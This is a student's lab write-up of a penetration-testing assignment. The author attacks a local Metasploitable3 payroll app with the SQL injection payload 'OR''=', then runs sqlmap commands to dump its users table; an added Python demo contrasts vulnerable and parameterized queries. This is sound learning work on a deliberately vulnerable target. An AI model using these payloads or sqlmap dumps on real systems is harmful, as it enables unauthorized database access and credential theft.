Penetration testing 1: OWASP 10

This post is about the first assignment in my course on Penetration testing.

I’m running Kali Linux 2018.2 x64 with the KDE desktop on an HP 655 G1 laptop. I also tried Kali Linux 2018.2 x64 (default) and Xubuntu 18.04.1 x64 from a live-USB, but those did not work for this assignment.

You can get your own Kali Linux from here.

You can get your own Xubuntu from here.

DISCLAIMER – This report is purely for penetration testing purposes and does not by any means encourage anyone to do anything illegal or malicious. Please note that I’m not doing anything over the internet, only in my own local network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Try out an OWASP 10 attack of your choosing on your own computer. (scope = localhost)

Metasploitable3

After yesterday’s miserable day of working and failing on this assignment I bit the bullet, said goodbye to my beloved Kubuntu and installed Kali Linux on my laptop.

The installation went smoothly without any hassle. I made the live-USB using this guide from Kali Linux.

This time following this guide by Tero worked without problems. As a fast recap, here’s what I did:

$ sudo apt-get update && sudo apt-get upgrade -y   # took around 10 minutes to upgrade
$ sudo apt-get install -y curl virtualbox vagrant
$ mkdir metas
$ cd metas/
$ nano Vagrantfile
 ↓ 
## Vagrantfile 
## http://terokarvinen.com/2018/install-metasploitable-3-vulnerable-target-computer
Vagrant.configure("2") do |config|
  config.vm.box = "rapid7/metasploitable3-ub1404"
  config.vm.network "forwarded_port", guest: 80, host: 8080
end

$ vagrant up

After the download (took around 15 minutes) I finally got the virtual machine to work!

So let’s browse to http://localhost:8080

Screenshot from 2018-08-27 14-15-35

A chat app, Drupal, a payroll app and phpmyadmin.

Let’s get to pentesting!

Manual SQL Injection – payroll_app.php

A PHP site with two text boxes for login, plus phpMyAdmin, was found on the computer? Sounds like a possible target for SQL injection.

I’ll try out what we did in class last time and insert 'OR''=' into the text boxes.

This modifies the SQL string and makes it so the SQL statement is still valid and always true.

'SELECT * FROM tablename WHERE User ="' + user + '" AND Password ="' + password + '"'; 


This is what I’m guessing the site’s part of the code that grabs data from the database roughly looks like, since this is supposed to be an easy task and easy to solve.

So inserting 'OR''=' and running it makes the resulting statement look like this:

SELECT * FROM tablename WHERE User ="'OR''='" AND Password ="'OR''='";

Putting in the correct username and password would result in the statement being true and the app working as intended, showing you the rows it’s supposed to. Inserting 'OR''=' makes it so the statement is always true and shows all of the rows.
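To make the "always true" reasoning concrete, here is an added example (not code from the post or from Metasploitable3) that runs the 'OR''=' payload against an in-memory SQLite table, once through a concatenated query like the one sketched above and once through a parameterized query. It assumes the real query uses single-quoted literals, which is what lets the payload close the literal; the table contents are constructed sample data.

```python
import sqlite3

# Constructed sample rows standing in for the payroll app's users table.
SAMPLE_USERS = [
    ("alice", "s3cret", 5200),
    ("bob", "hunter2", 4100),
    ("carol", "letmein", 4800),
]

# The same input the post types into both login boxes.
PAYLOAD = "'OR''='"


def build_db():
    """Create a throwaway database with the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, salary INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def lookup_vulnerable(con, user, password):
    """String-concatenated query: whatever the user types becomes SQL."""
    sql = ("SELECT username, salary FROM users WHERE username ='" + user
           + "' AND password ='" + password + "'")
    # With PAYLOAD in both boxes this becomes
    #   ... WHERE username =''OR''='' AND password =''OR''=''
    # AND binds tighter than OR, so the trailing ''='' makes every row match.
    return con.execute(sql).fetchall()


def lookup_safe(con, user, password):
    """Parameterized query: the driver binds the input as a value, never as SQL."""
    sql = "SELECT username, salary FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (user, password)).fetchall()


def demo():
    """Run the three cases the post discusses and return the rows each yields."""
    con = build_db()
    return {
        # A correct login behaves the same in both versions: one row.
        "valid_login": lookup_vulnerable(con, "alice", "s3cret"),
        # The payload dumps every row from the concatenated query...
        "payload_vulnerable": lookup_vulnerable(con, PAYLOAD, PAYLOAD),
        # ...and matches nothing when it is bound as a literal value.
        "payload_safe": lookup_safe(con, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case}: {rows}")
```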

Screenshot from 2018-08-27 14-24-02

Screenshot from 2018-08-27 14-24-23

And there we go, my guess was correct!

But can I find out the passwords of said users?

A lucky guess won’t do. Since we are allowed to use guides I’m going to use one I found. It’s a metasploit3 walkthrough made by mubix, I chose this one because it’s very detailed and thorough.

On page 17 and forward you can find the steps I’m about to try out!

SQLMap

I input the same command as used in the guide but replaced the IP to mine and added :8080 (the forwarded port mentioned earlier in the Vagrantfile).

hacker@kaliroope:~$ sqlmap -u http://ip.ad.re.ss:8080/payroll_app.php --data="user=admin&password=admin&s=OK"
.
.
.
[14:54:31] [WARNING] applying generic concatenation (CONCAT)
[14:54:31] [INFO] target URL appears to be UNION injectable with 4 columns
[14:54:31] [INFO] POST parameter 'user' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[14:54:31] [INFO] checking if the injection point on POST parameter 'user' is a false positive
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

“user” is vulnerable. Do I want to keep testing? Yes.

[14:59:35] [INFO] testing 'Oracle AND time-based blind'
[14:59:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:59:35] [INFO] POST parameter 'password' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[14:59:35] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

“password” is vulnerable, Y, keep testing. The program asks to choose from [0], [1] or [q]. Let’s see what the guide says. Switching over to the SQLMap shell, so select [q] to quit the program for now. Access the SQLMap shell by adding --sqlmap-shell to our command and, when inside, use --dump to show the database dump.

sqlmap -u http://ip.ad.re.ss:8080/payroll_app.php --data="user=admin&password=admin&s=OK" --sqlmap-shell


Screenshot from 2018-08-27 15-08-32.png

The guide says nothing about which he chose, so let’s just go with [0] – user.

Screenshot from 2018-08-27 15-11-58

And there we go, the data from database “payroll” table “users”!

I did try selecting [1] (password) and it gave out the same output. If I understood correctly this means that both parts of code (of the payroll app) that grab the info from the database are vulnerable and that’s what SQLMap takes advantage of.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is my first day of working with this assignment. Nothing worked out and I had to give up. Instead of deleting it I moved it to the end of the report, since it’s a nice example of how sometimes nothing works out.

1)

Metasploitable3

I want to try out the Metasploitable 3 practice target for this assignment, so let’s install the prerequisites:

$ sudo apt-get install vagrant virtualbox curl -y

Then let’s make the directory for the virtual machine and create a Vagrantfile; inside, insert the same as Tero did in his guide.

$ mkdir metasploitable3
$ cd metasploitable3/
$ nano Vagrantfile
         ↓
## Vagrantfile
## http://terokarvinen.com/2018/install-metasploitable-3-vulnerable-target-computer
Vagrant.configure("2") do |config|
  config.vm.box = "rapid7/metasploitable3-ub1404"
  config.vm.network "forwarded_port", guest: 80, host: 8080
end

Boot it up!

$ vagrant up

And after waiting a good 15 minutes for the machine to start up, VirtualBox is not working correctly. As I’m pretty low on time, I’ll switch over to Xubuntu 18.04.1 x64, where I know this should work.

I repeated the same steps and tried again. Did not work any better. Tried another computer, still error after error.

After a good hour of research I found out that Metasploitable3 requires 65 GB of space, which is not possible at the moment since I’m using a live-USB. So Metasploitable3 is not an option at this time, since I really need to get this assignment done.

WebGoat

OWASP has a vulnerable test dummy, so let’s see if it works.

$ git clone https://github.com/WebGoat/WebGoat

I’m going to use Vagrant to boot this up so let’s install the prerequisites and try starting it.

$ sudo apt-get install vagrant virtualbox
$ cd WebGoat/webgoat-images/vagrant-training
$ vagrant up

Screenshot_2018-08-26_19-36-24.png

Not working.

An hour of troubleshooting later I’m afraid I have to give up on this one as well.

Thoughts at this point

I never got to actually try out any pentesting today since even after 6-ish hours of achieving absolutely nothing I haven’t gotten a working target up.

Just heard from a classmate that to get Metasploit3 working he had installed Xubuntu 18.04.1. But that option is not actually possible for me right at this moment.

As a side note while trying to find a target I did find this pretty nifty website about SQL Injection, you could even try it out and all. So I guess I did actually get to try out a bit of penetration testing.

That’s it for today.
